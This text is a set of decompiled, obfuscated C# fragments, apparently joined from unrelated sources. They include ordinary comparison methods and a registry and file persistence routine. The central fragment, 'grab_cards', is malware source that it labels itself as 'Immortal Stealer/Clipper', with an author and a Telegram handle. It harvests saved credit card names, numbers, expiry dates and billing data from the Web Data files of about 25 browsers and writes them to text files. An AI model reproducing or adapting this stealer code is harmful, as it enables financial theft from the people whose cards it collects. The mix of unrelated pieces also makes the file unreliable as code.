public void method_45(string string_2) { try { lock (Class15.object_0) { Class15.smethod_5(); Class15.Class17 @class = null; try { string str = Class15.Class16.string_0; string str2 = Class15.string_3 + "\\"; RegistryKey registryKey = Registry.CurrentUser; if (Class15.smethod_0()) { registryKey = Registry.LocalMachine; } RegistryKey registryKey2 = registryKey.OpenSubKey(str + str2, false); if (registryKey2 != null) { Class15.Class17 class2 = new Class15.Class17(); class2.method_0((string)registryKey2.GetValue("1"), Class15.byte_1, Class15.byte_2); if (@class == null) { @class = class2; } if (class2.ulong_0 > @class.ulong_0) { @class = class2; } } } catch { } try { if (Class14.smethod_5(base.GetType().Assembly).ToString().Length > 0 && File.Exists(Class14.smethod_5(base.GetType().Assembly).ToString())) { Class15.Class17 class3 = new Class15.Class17(); class3.method_0(Class15.smethod_8(Path.GetDirectoryName(Class14.smethod_5(base.GetType().Assembly).ToString()), Class15.string_2), Class15.byte_1, Class15.byte_2); if (@class == null) { @class = class3; } if (class3.ulong_0 > @class.ulong_0) { @class = class3; } } } catch { } try { if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + Class15.Class16.string_2 + Class15.string_2)) { Class15.Class17 class4 = new Class15.Class17(); class4.method_0(Encoding.Unicode.GetString(Class15.smethod_11(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + Class15.Class16.string_2 + Class15.string_2)), Class15.byte_1, Class15.byte_2); if (@class == null) { @class = class4; } if (class4.ulong_0 > @class.ulong_0) { @class = class4; } } } catch { } if (@class == null) { @class = new Class15.Class17(); } @class.string_0 = string_2; try { string str3 = Class15.Class16.string_0; string str4 = Class15.string_3 + "\\"; RegistryKey registryKey3 = Registry.CurrentUser; if (Class15.smethod_0()) { registryKey3 = Registry.LocalMachine; } RegistryKey registryKey4; if (registryKey3.OpenSubKey(str3 + str4, false) == null) { registryKey3 = Registry.CurrentUser; if (Class15.smethod_0()) { registryKey3 = Registry.LocalMachine; } registryKey4 = registryKey3.CreateSubKey(str3 + str4); } registryKey3 = Registry.CurrentUser; if (Class15.smethod_0()) { registryKey3 = Registry.LocalMachine; } registryKey4 = registryKey3.OpenSubKey(str3 + str4, true); if (registryKey4 != null) { registryKey4.SetValue("1", @class.method_5(Class15.byte_1, Class15.byte_2)); registryKey4.Close(); } } catch { } try { if (Class14.smethod_5(base.GetType().Assembly).ToString().Length > 0 && File.Exists(Class14.smethod_5(base.GetType().Assembly).ToString())) { Class15.smethod_7(Path.GetDirectoryName(Class14.smethod_5(base.GetType().Assembly).ToString()), Class15.string_2, @class.method_5(Class15.byte_1, Class15.byte_2)); } } catch { } try { FileStream fileStream = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + Class15.Class16.string_2 + Class15.string_2, FileMode.Create, FileAccess.ReadWrite); byte[] bytes = Encoding.Unicode.GetBytes(@class.method_5(Class15.byte_1, Class15.byte_2)); fileStream.Write(bytes, 0, bytes.Length); fileStream.Close(); } catch { } } } catch { } }
// Token: 0x06001F6F RID: 8047 // RVA: 0x000B1E0C File Offset: 0x000B000C public void method_0(Class14 class14_0) { if (class14_0.int_0 <= this.class312_0.StartTime) { return; } if (class14_0.int_0 >= this.class312_0.EndTime) { return; } class14_0.float_0 = (float)this.class428_0.method_6((int)class14_0.float_0, this.int_0); }
// Token: 0x06000057 RID: 87 public static void grab_cards(string string_0) { string environmentVariable = Environment.GetEnvironmentVariable("LocalAppData"); string[] array = new string[] { environmentVariable + "\\Google\\Chrome\\User Data\\Default\\Web Data", Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera Stable\\Web Data", environmentVariable + "\\Kometa\\User Data\\Default\\Web Data", environmentVariable + "\\Orbitum\\User Data\\Default\\Web Data", environmentVariable + "\\Comodo\\Dragon\\User Data\\Default\\Web Data", environmentVariable + "\\Amigo\\User\\User Data\\Default\\Web Data", environmentVariable + "\\Torch\\User Data\\Default\\Web Data", environmentVariable + "\\CentBrowser\\User Data\\Default\\Web Data", environmentVariable + "\\Go!\\User Data\\Default\\Web Data", environmentVariable + "\\uCozMedia\\Uran\\User Data\\Default\\Web Data", environmentVariable + "\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data", environmentVariable + "\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data", environmentVariable + "\\BlackHawk\\User Data\\Default\\Web Data", environmentVariable + "\\AcWebBrowser\\User Data\\Default\\Web Data", environmentVariable + "\\CoolNovo\\User Data\\Default\\Web Data", environmentVariable + "\\Epic Browser\\User Data\\Default\\Web Data", environmentVariable + "\\Baidu Spark\\User Data\\Default\\Web Data", environmentVariable + "\\Rockmelt\\User Data\\Default\\Web Data", environmentVariable + "\\Sleipnir\\User Data\\Default\\Web Data", environmentVariable + "\\SRWare Iron\\User Data\\Default\\Web Data", environmentVariable + "\\Titan Browser\\User Data\\Default\\Web Data", environmentVariable + "\\Flock\\User Data\\Default\\Web Data", environmentVariable + "\\Vivaldi\\User Data\\Default\\Web Data", environmentVariable + "\\Sputnik\\User Data\\Default\\Web Data", environmentVariable + "\\Maxthon\\User Data\\Default\\Web Data" }; foreach (string text in array) { try { string str = ""; if (text.Contains("Chrome")) { str = "Google"; } if (text.Contains("Yandex")) { str = "Yandex"; } if (text.Contains("Orbitum")) { str = "Orbitum"; } if (text.Contains("Opera")) { str = "Opera"; } if (text.Contains("Amigo")) { str = "Amigo"; } if (text.Contains("Torch")) { str = "Torch"; } if (text.Contains("Comodo")) { str = "Comodo"; } if (text.Contains("CentBrowser")) { str = "CentBrowser"; } if (text.Contains("Go!")) { str = "Go!"; } if (text.Contains("uCozMedia")) { str = "uCozMedia"; } if (text.Contains("MapleStudio")) { str = "MapleStudio"; } if (text.Contains("BlackHawk")) { str = "BlackHawk"; } if (text.Contains("CoolNovo")) { str = "CoolNovo"; } if (text.Contains("Vivaldi")) { str = "Vivaldi"; } if (text.Contains("Sputnik")) { str = "Sputnik"; } if (text.Contains("Maxthon")) { str = "Maxthon"; } if (text.Contains("AcWebBrowser")) { str = "AcWebBrowser"; } if (text.Contains("Epic Browser")) { str = "Epic Browser"; } if (text.Contains("Baidu Spark")) { str = "Baidu Spark"; } if (text.Contains("Rockmelt")) { str = "Rockmelt"; } if (text.Contains("Sleipnir")) { str = "Sleipnir"; } if (text.Contains("SRWare Iron")) { str = "SRWare Iron"; } if (text.Contains("Titan Browser")) { str = "Titan Browser"; } if (text.Contains("Flock")) { str = "Flock"; } try { List <CardData> list = Class14.fetch_cookies(text); if (list != null) { Directory.CreateDirectory(string_0 + "\\CC\\"); using (StreamWriter streamWriter = new StreamWriter(string_0 + "\\CC\\" + str + "_CC.txt")) { streamWriter.WriteLine("# Stealed CC by Immortal Stealer/Clipper "); streamWriter.WriteLine("# Create By Zet5D "); streamWriter.WriteLine("# Telegram: @Zet5D"); foreach (CardData cardData in list) { streamWriter.Write(string.Concat(new string[] { cardData.Name, "\t", cardData.Exp_m, "\t", cardData.Exp_y, "\t", cardData.Number, "\t", cardData.Billing, "\r\n" })); } } } } catch { } } catch (Exception ex) { Console.WriteLine(ex.ToString()); } } }
// Token: 0x06001F71 RID: 8049 // RVA: 0x00019B3A File Offset: 0x00017D3A public bool method_0(Class14 class14_0) { return class14_0.int_0 <= this.int_0; }